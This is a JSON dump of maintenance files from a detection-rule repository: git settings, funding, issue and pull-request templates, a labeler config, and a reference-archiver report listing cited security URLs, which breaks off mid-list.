[
  {
    "path": ".gitattributes",
    "content": "# Set the default behavior, in case people don't have core.autocrlf set.\n* text=lf\n\n# Explicitly declare text files you want to always be normalized and converted\n# to native line endings on checkout.\n*.c text\n*.h text\n*.csv text\n*.sh text\n*.py text\n\n\n# Declare files that will always have CRLF line endings on checkout.\n*.sln text eol=crlf\n\n# Denote all files that are truly binary and should not be modified.\n*.png binary\n*.jpg binary\n\n# force lf for Sigma rule\n*.yml text eol=lf\n"
  },
  {
    "path": ".github/FUNDING.yml",
    "content": "# These are supported funding model platforms\n\ngithub: [thomaspatzke]\npatreon: # Replace with a single Patreon username\nopen_collective: # Replace with a single Open Collective username\nko_fi: # Replace with a single Ko-fi username\ntidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel\ncommunity_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry\nliberapay: # Replace with a single Liberapay username\nissuehunt: # Replace with a single IssueHunt username\notechie: # Replace with a single Otechie username\nlfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry\ncustom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/false_positive_report.yml",
    "content": "name: \"False Positive Report\"\ndescription: Report false positives with SIGMA rules\nlabels: [False-Positive]\nassignees:\n  - nasbench\nbody:\n- type: input\n  attributes:\n    label: Rule UUID\n    placeholder: \"f3be1b1d-eb3c-4ab1-b5e5-81e330fa2cd0\"\n    description: |\n      You can copy the rule id from the `id` field in the rule.\n  validations:\n    required: true\n\n- type: textarea\n  attributes:\n    label: Example EventLog\n    description: An event log example of the false positive in question\n    placeholder: |\n      SubjectLogonId 0x1d3f2a \n      NewProcessId 0x5f14 \n      NewProcessName C:\\Windows\\System32\\dllhost.exe \n      TokenElevationType %%1937 \n      ProcessId 0x1270 \n      CommandLine dllhost \n      TargetUserSid S-1-0-0 \n      TargetUserName - \n      TargetDomainName - \n      TargetLogonId 0x0 \n      ParentProcessName C:\\Windows\\System32\\cmd.exe \n  validations:\n    required: true\n\n- type: textarea\n  attributes:\n    label: Description\n    placeholder: This is just a placeholder description\n    description: |\n      Provide any additional information that you might think is helpful\n  validations:\n    required: true"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/rule_proposal.md",
    "content": "---\nname: \"Rule Proposal\"\nabout: Rule Idea Proposal\ntitle: ''\nlabels: Rule\nassignees:\n  - nasbench\n\n---\n\n### Description of the Idea of the Rule\n\n<!--\nA clear and concise description of idea of the rule.\n-->\n\n### Public References / Example Event Log\n\n<!--\nAdditional references and logs if possible to ease the process of creating the rule\n-->\n"
  },
  {
    "path": ".github/PULL_REQUEST_TEMPLATE.md",
    "content": "<!--\nThanks for your contribution. Please make sure to fill the contents of this template with the necessary information to ease and speed up the review process.\n\n!!! PLEASE DO NOT DELETE ANY SECTION, COMMENT OR THE CONTENT OF THE TEMPLATE. !!!\n-->\n\n### Summary of the Pull Request\n\n<!--\n**Please note that this section is required and must be filled**\nA short summary of your pull request.\n-->\n\n### Changelog\n\n<!--\n** Don't remove this comment **\nYou need to add one line for every changed file of the PR and prefix one of the following tags:\nnew:\t<title>\nupdate:\t<title> - <optional comment>\nfix:\t<title> - <optional comment>\nremove:\t<title> - <optional comment>\nchore: for non-detection related changes (e.g. dates/titles) and changes on workflow\n\ne.g.\nnew: Brute-Force Attacks on Azure Admin Account\nupdate: Suspicious Microsoft Office Child Process - add MSPUB.EXE\nfix: Malware User Agent - remove legitimate Firefox UA\nchore: workflow - update checkout version\nremove: Suspicious Office Execution - deprecated in favour of 8f922766-a1d3-4b57-9966-b27de37fddd2\n-->\n\n### Example Log Event\n\n<!--\nFill this in case of false positive fixes\n-->\n\n### Fixed Issues\n\n<!--\nLink the fixed issues here, in case your commit fixes issues with rules or code\n-->\n\n### SigmaHQ Rule Creation Conventions\n\n- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/)\n"
  },
  {
    "path": ".github/labeler.yml",
    "content": "Rules:\n- changed-files:\n    - any-glob-to-any-file:\n        - 'deprecated/**'\n        - 'rules/**'\n        - 'rules-compliance/**'\n        - 'rules-dfir/**'\n        - 'rules-emerging-threats/**'\n        - 'rules-placeholder/**'\n        - 'rules-threat-hunting/**'\nEmerging-Threats:\n- changed-files:\n    - any-glob-to-any-file: 'rules-emerging-threats/**'\nThreat-Hunting:\n- changed-files:\n    - any-glob-to-any-file: 'rules-threat-hunting/**'\nMacOS:\n- changed-files:\n    - any-glob-to-any-file:\n        - 'rules/macos/**'\n        - 'rules-compliance/macos/**'\n        - 'rules-dfir/macos/**'\n        - 'rules-emerging-threats/macos/**'\n        - 'rules-placeholder/macos/**'\n        - 'rules-threat-hunting/macos/**'\nWindows:\n- changed-files:\n    - any-glob-to-any-file:\n        - 'rules/windows/**'\n        - 'rules-compliance/windows/**'\n        - 'rules-dfir/windows/**'\n        - 'rules-emerging-threats/windows/**'\n        - 'rules-placeholder/windows/**'\n        - 'rules-threat-hunting/windows/**'\nLinux:\n- changed-files:\n    - any-glob-to-any-file:\n        - 'rules/linux/**'\n        - 'rules-compliance/linux/**'\n        - 'rules-dfir/linux/**'\n        - 'rules-emerging-threats/linux/**'\n        - 'rules-placeholder/linux/**'\n        - 'rules-threat-hunting/linux/**'\nMaintenance:\n- changed-files:\n    - any-glob-to-any-file:\n        - 'documentation/**'\n        - 'tests/**'\n        - '.github/**'\n        - 'README.md'\n        - 'Releases.md'\nReview Needed:\n- changed-files:\n    - any-glob-to-any-file: '**'\n"
  },
  {
    "path": ".github/latest_archiver_output.md",
    "content": "# Reference Archiver Results\n\nLast Execution: 2026-03-01 02:19:10\n\n### Archiver Script Results\n\n\n#### Newly Archived References\n\nN/A\n\n#### Already Archived References\n\n- https://gtfobins.github.io/gtfobins/curl/\n- https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c\n- https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\n- https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html\n- https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724\n- https://github.com/clearvector/lambda-spy\n- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing\n- https://docs.python.org/2/library/simplehttpserver.html\n- https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\n- https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/\n- https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance\n- https://www.chrisfarris.com/post/effective-aws-ransomware/\n- https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md\n- https://nvd.nist.gov/vuln/detail/CVE-2025-2825\n- https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/\n- https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group\n- https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\n- https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178\n\n#### Error While Archiving References\n\n- http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\n- https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f\n- https://unicornofhunt.com/2025/05/22/When-Unicorns-Go-Quiet-BITS-Jobs-and-the-Art-of-Stealthy-Transfers/\n- https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke\n- https://www.trendmicro.com/en_gb/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\n- https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/\n- https://www.cve.org/CVERecord?id=CVE-2024-1709\n- https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/\n- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html\n- https://unit42.paloaltonetworks.com/cve-2025-59287/\n- https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n- https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html\n- https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion\n- https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode\n- https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html\n- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-database-transact-sql?view=sql-server-ver16\n- https://x.com/Wietze/status/1933495426952421843\n- https://paper.seebug.org/1495/\n- https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit\n- https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules\n- https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\n- https://www.cisa.gov/stopransomware/ransomware-guide\n- https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector\n- https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html\n- https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n- https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53\n- https://localtonet.com/documents/supported-tunnels\n- https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_\n- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm\n- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n- https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role\n- https://tria.ge/241015-l98snsyeje/behavioral2\n- https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/\n- https://securelist.com/sidewinder-apt/114089/\n- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36\n- https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing\n- https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\n- https://www.joesandbox.com/analysis/1605063/0/html\n- https://syedhasan010.medium.com/forensics-analysis-of-an-lnk-file-da68a98b8415\n- https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\n- https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\n- https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin\n- https://intel.thedfirreport.com/eventReports/view/57\n- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/\n- https://github.com/CoreyCBurton/DripLoaderNG\n- https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\n- https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/\n- https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/\n- https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure\n- https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n- https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python\n- https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy\n- https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675\n- http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/\n- https://github.com/trufflesecurity/trufflehog\n- https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/\n- https://www.linkedin.com/posts/huntress-labs_when-a-sketchy-incident-hits-your-network-activity-7304940371078238208-Th_l/?utm_source=share&utm_medium=member_desktop&rcm=ACoAAAJTlRcB28IaUtg03HUU-IdliwzoAL1flGc\n- https://github.com/TwoSevenOneT/EDR-Freeze\n- https://pentestlab.blog/2022/03/21/unconstrained-delegation/\n- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n- https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\n- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-deviceguard\n- https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639\n- https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n- https://cardinalops.com/blog/the-art-of-anomaly-hunting-patterns-detection/\n- https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15\n- https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry\n- https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\n- https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399\n- https://redfoxsec.com/blog/ipv6-dns-takeover/\n- https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771\n- https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\n- https://unit42.paloaltonetworks.com/chromeloader-malware/\n- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2\n- https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session\n- https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/\n- https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/\n- https://www.cisa.gov/known-exploited-vulnerabilities-catalog\n- https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md\n- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet\n- https://www.cyberciti.biz/faq/linux-remove-user-command/\n- https://x.com/cyberfeeddigest/status/1887041526397587859\n- https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173\n- https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\n- https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing\n- https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327\n- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\n- https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt\n- https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n- https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776\n- https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/\n- https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/\n- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3\n- http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/\n- https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c\n- https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1\n- https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html\n- https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC\n- https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\n- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html\n- https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n- https://learn.microsoft.com/en-us/sql/t-sql/statements/truncate-table-transact-sql?view=sql-server-ver16\n- https://twitter.com/Kostastsale/status/1480716528421011458\n- https://www.fortiguard.com/psirt/FG-IR-22-398\n- https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files\n- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\n- https://dfir.ch/posts/linux_capabilities/\n- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html\n- https://www.cyberciti.biz/faq/how-force-kill-process-linux/\n- https://ss64.com/osx/sw_vers.html\n- https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection\n- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/\n- https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\n- https://blu.org/mhonarc/discuss/2001/04/msg00285.php\n- https://www.huntress.com/blog/attacking-mssql-servers-pt-ii\n- https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/\n- https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\n- https://docs.microsoft.com/en-us/sql/tools/bcp-utility\n- https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html\n- https://lolbas-project.github.io/#/download\n- https://man7.org/linux/man-pages/man2/personality.2.html\n- https://research.checkpoint.com/2025/stealth-falcon-zero-day/\n- https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\n- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/\n- https://www.softperfect.com/products/networkscanner/\n- https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/\n- https://github.com/amidaware/tacticalrmm\n- https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/\n- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n- https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/\n- https://ngrok.com/blog-post/new-ngrok-domains\n- https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39\n- https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n- https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\n- https://github.com/mhaskar/FsquirtCPLPoC\n- https://learn.microsoft.com/en-us/windows/wsl/install\n- https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack\n- https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html\n- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n- https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16\n- https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin\n- https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\n- https://naikordian.github.io/blog/posts/brute-force-aws-console/\n- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/\n- https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/\n- https://securelist.com/apt41-in-africa/116986/\n- https://tria.ge/231023-lpw85she57/behavioral2\n- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html\n- https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\n- https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/\n- https://github.com/0xthirteen/SharpMove/\n- https://www.group-ib.com/blog/apt41-world-tour-2021/\n- https://www.zscaler.fr/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla\n- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/\n- https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting\n- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/\n- https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/\n- https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml\n- https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n- https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/\n- https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md\n- https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n- https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware\n- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray\n- https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc\n- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#exfiltration\n- https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml\n- https://juggernaut-sec.com/capabilities/#cap_setgid\n- https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef\n- https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c\n- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\n- https://pwn.guide/free/web/crushftp\n- https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1\n- https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/\n- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html\n- https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps\n- https://www.huntress.com/blog/silencing-the-edr-silencers\n- https://vmois.dev/query-signal-desktop-messages-sqlite/\n- https://tria.ge/231212-r1bpgaefar/behavioral2\n- https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml\n- https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625\n- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)\n- https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/\n- https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh\n- https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/\n- https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html\n- https://feeds.alphasoc.net/bad-etlds.txt\n- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/\n- https://ss64.com/nt/set.html\n- https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n- https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan\n- https://github.com/Arno0x/DNSExfiltrator/\n- https://x.com/wietze/status/1958302556033065292?s=12\n- https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html\n- https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/\n- https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md\n- https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/\n- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952\n- https://man7.org/linux/man-pages/man2/sysinfo.2.html\n- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon\n- https://twitter.com/th3_protoCOL/status/1536788652889497600\n- https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1\n- https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/\n- https://www.loobins.io/binaries/xattr/\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker\n- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json\n- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference\n- https://github.com/grayhatkiller/SharpExShell\n- https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe\n- https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps\n- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/\n- https://adsecurity.org/?p=3377\n- https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage\n- https://x.com/byrne_emmy12099/status/1932346420226658668\n- https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes\n- https://moonlock.com/amos-backdoor-persistent-access\n- https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea\n- https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/\n- https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/\n- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457\n- https://blog.axelarator.net/hunting-for-edr-freeze/\n- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n- https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060\n- https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/\n- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel\n- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local\n- https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/\n- https://www.coreycburton.com/blog/driploader-case-study\n- https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting\n- https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/\n- https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html\n- https://ss64.com/nt/schtasks.html\n- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md\n- https://cloud.google.com/logging/docs/audit/understanding-audit-logs\n- 